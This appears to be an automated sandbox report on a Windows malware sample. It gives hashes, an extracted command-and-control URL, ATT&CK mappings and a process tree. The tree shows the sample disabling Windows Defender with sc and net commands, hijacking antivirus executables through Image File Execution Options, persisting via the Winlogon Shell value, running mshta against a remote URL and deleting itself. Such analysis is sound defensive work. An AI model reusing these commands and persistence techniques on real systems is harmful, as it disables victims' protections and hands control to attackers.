Analysis
-
max time kernel
150s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
14-07-2024 15:43
Static task
static1
Behavioral task
behavioral1
Sample
4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe
-
Size
2.5MB
-
MD5
4675d8b4117bc31e84521883391cc9f3
-
SHA1
88ca0a53d039c9160606b21b2018f62f6165d943
-
SHA256
0a76c32c7b8958250919ac8668c6d9fe7c9d2ddc360f87b2fa8afe0108d709d5
-
SHA512
944681751aea86766e90ded22d08cf39042c21772955b49945ac7d2cace6531b775111987a94c4b7fd60a0380639d991f033f3a3a234cc32b06e534717b57997
-
SSDEEP
49152:ODxcr+qkQUHgYvPGenqfWrb6VKQ4VDEIMnAuAlLYAzpL528s35:ODx0NsTH6fW3Q8DEIMAuAlLYAzpdbsp
Malware Config
Extracted
http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=RPXOCQRF&2=i-s&3=74&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\qarqpv.exe" qarqpv.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe qarqpv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" qarqpv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe qarqpv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" qarqpv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" qarqpv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe qarqpv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe qarqpv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe qarqpv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" qarqpv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe qarqpv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" qarqpv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe qarqpv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" qarqpv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" qarqpv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe qarqpv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" qarqpv.exe -
Deletes itself 1 IoCs
pid Process 2776 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2640 qarqpv.exe -
Loads dropped DLL 2 IoCs
pid Process 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2744 sc.exe 2708 sc.exe 2172 sc.exe 2012 sc.exe 1924 sc.exe 2720 sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2640 qarqpv.exe Token: SeShutdownPrivilege 2640 qarqpv.exe Token: SeDebugPrivilege 2640 qarqpv.exe Token: SeShutdownPrivilege 2640 qarqpv.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe 2640 qarqpv.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2640 qarqpv.exe 2640 qarqpv.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2976 wrote to memory of 2744 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 30 PID 2976 wrote to memory of 2744 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 30 PID 2976 wrote to memory of 2744 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 30 PID 2976 wrote to memory of 2744 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 30 PID 2976 wrote to memory of 2708 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 31 PID 2976 wrote to memory of 2708 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 31 PID 2976 wrote to memory of 2708 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 31 PID 2976 wrote to memory of 2708 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 31 PID 2976 wrote to memory of 2700 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 33 PID 2976 wrote to memory of 2700 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 33 PID 2976 wrote to memory of 2700 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 33 PID 2976 wrote to memory of 2700 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 33 PID 2976 wrote to memory of 2172 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 35 PID 2976 wrote to memory of 2172 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 35 PID 2976 wrote to memory of 2172 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 35 PID 2976 wrote to memory of 2172 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 35 PID 2976 wrote to memory of 2640 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 38 PID 2976 wrote to memory of 2640 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 38 PID 2976 wrote to memory of 2640 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 38 PID 2976 wrote to memory of 2640 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 38 PID 2976 wrote to memory of 2776 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 39 PID 2976 wrote to memory of 2776 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 39 PID 2976 wrote to memory of 2776 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 39 PID 2976 wrote to memory of 2776 2976 4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe 39 PID 2700 wrote to memory of 2552 2700 net.exe 40 PID 2700 wrote to memory of 2552 2700 net.exe 40 PID 2700 wrote to memory of 2552 2700 net.exe 40 PID 2700 wrote to memory of 2552 2700 net.exe 40 PID 2640 wrote to memory of 2720 2640 qarqpv.exe 42 PID 2640 wrote to memory of 2720 2640 qarqpv.exe 42 PID 2640 wrote to memory of 2720 2640 qarqpv.exe 42 PID 2640 wrote to memory of 2720 2640 qarqpv.exe 42 PID 2640 wrote to memory of 1924 2640 qarqpv.exe 43 PID 2640 wrote to memory of 1924 2640 qarqpv.exe 43 PID 2640 wrote to memory of 1924 2640 qarqpv.exe 43 PID 2640 wrote to memory of 1924 2640 qarqpv.exe 43 PID 2640 wrote to memory of 560 2640 qarqpv.exe 44 PID 2640 wrote to memory of 560 2640 qarqpv.exe 44 PID 2640 wrote to memory of 560 2640 qarqpv.exe 44 PID 2640 wrote to memory of 560 2640 qarqpv.exe 44 PID 2640 wrote to memory of 2012 2640 qarqpv.exe 45 PID 2640 wrote to memory of 2012 2640 qarqpv.exe 45 PID 2640 wrote to memory of 2012 2640 qarqpv.exe 45 PID 2640 wrote to memory of 2012 2640 qarqpv.exe 45 PID 560 wrote to memory of 1276 560 net.exe 50 PID 560 wrote to memory of 1276 560 net.exe 50 PID 560 wrote to memory of 1276 560 net.exe 50 PID 560 wrote to memory of 1276 560 net.exe 50 PID 2640 wrote to memory of 2828 2640 qarqpv.exe 51 PID 2640 wrote to memory of 2828 2640 qarqpv.exe 51 PID 2640 wrote to memory of 2828 2640 qarqpv.exe 51 PID 2640 wrote to memory of 2828 2640 qarqpv.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2708
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵PID:2552
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:2172
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\qarqpv.exeC:\Users\Admin\AppData\Roaming\Microsoft\qarqpv.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:1924
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵PID:1276
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:2012
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=RPXOCQRF&2=i-s&3=74&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Modifies Internet Explorer settings
PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\4675D8~1.EXE" >> NUL2⤵
- Deletes itself
PID:2776
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD54675d8b4117bc31e84521883391cc9f3
SHA188ca0a53d039c9160606b21b2018f62f6165d943
SHA2560a76c32c7b8958250919ac8668c6d9fe7c9d2ddc360f87b2fa8afe0108d709d5
SHA512944681751aea86766e90ded22d08cf39042c21772955b49945ac7d2cace6531b775111987a94c4b7fd60a0380639d991f033f3a3a234cc32b06e534717b57997